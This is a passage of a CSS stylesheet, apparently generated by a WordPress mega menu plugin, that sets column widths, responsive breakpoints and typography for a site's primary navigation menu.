{\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-6 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-6 {\n    width: 83.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-6 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-7 {\n    width: 14.28571%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-7 {\n    width: 28.57143%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-7 {\n    width: 42.85714%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-7 {\n    width: 57.14286%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-7 {\n    width: 71.42857%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-7 {\n    width: 85.71429%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-7 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-8 {\n    width: 12.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-8 {\n    width: 25%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-8 {\n    width: 37.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-8 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-8 {\n    width: 62.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-8 {\n    width: 75%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-8 {\n    width: 87.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-8-of-8 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-9 {\n    width: 11.11111%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-9 {\n    width: 22.22222%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-9 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-9 {\n    width: 44.44444%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-9 {\n    width: 55.55556%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-9 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-9 {\n    width: 77.77778%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-8-of-9 {\n    width: 88.88889%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-9-of-9 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-10 {\n    width: 10%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-10 {\n    width: 20%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-10 {\n    width: 30%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-10 {\n    width: 40%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-10 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-10 {\n    width: 60%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-10 {\n    width: 70%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-8-of-10 {\n    width: 80%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-9-of-10 {\n    width: 90%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-10-of-10 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-11 {\n    width: 9.09091%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-11 {\n    width: 18.18182%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-11 {\n    width: 27.27273%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-11 {\n    width: 36.36364%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-11 {\n    width: 45.45455%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-11 {\n    width: 54.54545%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-11 {\n    width: 63.63636%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-8-of-11 {\n    width: 72.72727%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-9-of-11 {\n    width: 81.81818%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-10-of-11 {\n    width: 90.90909%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-11-of-11 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-1-of-12 {\n    width: 8.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-2-of-12 {\n    width: 16.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-3-of-12 {\n    width: 25%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-4-of-12 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-5-of-12 {\n    width: 41.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-6-of-12 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-7-of-12 {\n    width: 58.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-8-of-12 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-9-of-12 {\n    width: 75%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-10-of-12 {\n    width: 83.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-11-of-12 {\n    width: 91.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-columns-12-of-12 {\n    width: 100%;\n  }\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row > ul.mega-sub-menu > li.mega-menu-column {\n    width: 100%;\n    clear: both;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-row .mega-menu-column > ul.mega-sub-menu > li.mega-menu-item {\n  padding: 15px 15px 15px 15px;\n  width: 100%;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu {\n  z-index: 999;\n  border-radius: 0;\n  background: #f1f1f1;\n  border: 0;\n  padding: 0px 0px 0px 0px;\n  position: absolute;\n  width: 100%;\n  max-width: none;\n  left: 0;\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu {\n    float: left;\n    position: static;\n    width: 100%;\n  }\n}\n@media only screen and (min-width: 601px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-1 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-2 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-2 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-3 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-3 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-3 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-4 {\n    width: 25%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-4 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-4 {\n    width: 75%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-4 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-5 {\n    width: 20%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-5 {\n    width: 40%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-5 {\n    width: 60%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-5 {\n    width: 80%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-5-of-5 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-6 {\n    width: 16.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-6 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-6 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-6 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-5-of-6 {\n    width: 83.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-6-of-6 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-7 {\n    width: 14.28571%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-7 {\n    width: 28.57143%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-7 {\n    width: 42.85714%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-7 {\n    width: 57.14286%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-5-of-7 {\n    width: 71.42857%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-6-of-7 {\n    width: 85.71429%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-7-of-7 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-8 {\n    width: 12.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-8 {\n    width: 25%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-8 {\n    width: 37.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-8 {\n    width: 50%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-5-of-8 {\n    width: 62.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-6-of-8 {\n    width: 75%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-7-of-8 {\n    width: 87.5%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-8-of-8 {\n    width: 100%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-1-of-9 {\n    width: 11.11111%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-2-of-9 {\n    width: 22.22222%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-3-of-9 {\n    width: 33.33333%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-4-of-9 {\n    width: 44.44444%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-5-of-9 {\n    width: 55.55556%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-6-of-9 {\n    width: 66.66667%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-7-of-9 {\n    width: 77.77778%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-8-of-9 {\n    width: 88.88889%;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-columns-9-of-9 {\n    width: 100%;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu .mega-description-group .mega-menu-description {\n  margin: 5px 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item ul.mega-sub-menu {\n  clear: both;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item ul.mega-sub-menu li.mega-menu-item ul.mega-sub-menu {\n  margin-left: 10px;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu ul.mega-sub-menu ul.mega-sub-menu {\n  margin-left: 10px;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item {\n  color: #666;\n  font-family: inherit;\n  font-size: 14px;\n  display: block;\n  float: left;\n  clear: none;\n  padding: 15px 15px 15px 15px;\n  vertical-align: top;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item.mega-menu-clear, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item.mega-menu-clear {\n  clear: left;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item h4.mega-block-title, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item h4.mega-block-title {\n  color: #555;\n  font-family: inherit;\n  font-size: 16px;\n  text-transform: uppercase;\n  text-decoration: none;\n  font-weight: bold;\n  text-align: left;\n  margin: 0px 0px 0px 0px;\n  padding: 0px 0px 5px 0px;\n  vertical-align: top;\n  display: block;\n  visibility: inherit;\n  border: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item h4.mega-block-title:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item h4.mega-block-title:hover {\n  border-color: rgba(0, 0, 0, 0);\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link {\n  /* Mega Menu > Menu Themes > Mega Menus > Second Level Menu Items */\n  color: #555;\n  font-family: inherit;\n  font-size: 16px;\n  text-transform: uppercase;\n  text-decoration: none;\n  font-weight: bold;\n  text-align: left;\n  margin: 0px 0px 0px 0px;\n  padding: 0px 0px 0px 0px;\n  vertical-align: top;\n  display: block;\n  border: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover {\n  border-color: rgba(0, 0, 0, 0);\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:focus, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:focus {\n  /* Mega Menu > Menu Themes > Mega Menus > Second Level Menu Items (Hover) */\n  color: #555;\n  font-weight: bold;\n  text-decoration: none;\n  background: rgba(0, 0, 0, 0);\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link {\n  /* Mega Menu > Menu Themes > Mega Menus > Third Level Menu Items */\n  color: #666;\n  font-family: inherit;\n  font-size: 14px;\n  text-transform: none;\n  text-decoration: none;\n  font-weight: normal;\n  text-align: left;\n  margin: 0px 0px 0px 0px;\n  padding: 0px 0px 0px 0px;\n  vertical-align: top;\n  display: block;\n  border: 0;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:hover {\n  border-color: rgba(0, 0, 0, 0);\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item.mega-icon-left.mega-has-description.mega-has-icon > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item.mega-icon-left.mega-has-description.mega-has-icon > a.mega-menu-link {\n  display: flex;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:focus, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item li.mega-menu-item > a.mega-menu-link:focus {\n  /* Mega Menu > Menu Themes > Mega Menus > Third Level Menu Items (Hover) */\n  color: #666;\n  font-weight: normal;\n  text-decoration: none;\n  background: rgba(0, 0, 0, 0);\n}\n@media only screen and (max-width: 600px) {\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu {\n    border: 0;\n    padding: 10px;\n    border-radius: 0;\n  }\n  #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu > ul.mega-sub-menu > li.mega-menu-item {\n    width: 100%;\n    clear: both;\n  }\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link {\n  color: #666;\n  font-family: inherit;\n  font-size: 14px;\n  text-transform: none;\n  text-decoration: none;\n  font-weight: normal;\n  margin: 0;\n  border: 0;\n  padding: 0px 0px 0px 0px;\n  vertical-align: top;\n  display: block;\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:focus, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:hover, #mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-megamenu.mega-no-headers > ul.mega-sub-menu li.mega-menu-column > ul.mega-sub-menu > li.mega-menu-item > a.mega-menu-link:focus {\n  color: #666;\n  font-weight: normal;\n  text-decoration: none;\n  background: rgba(0, 0, 0, 0);\n}\n#mega-menu-wrap-primary #mega-menu-primary > li.mega-menu-flyout ul.mega-sub-menu {\n  z-index: 999;\n  position: absolute;\n  width: 250px;\n  border: 0;\n  padding: 0px 0px 0px 0px;\n  background: 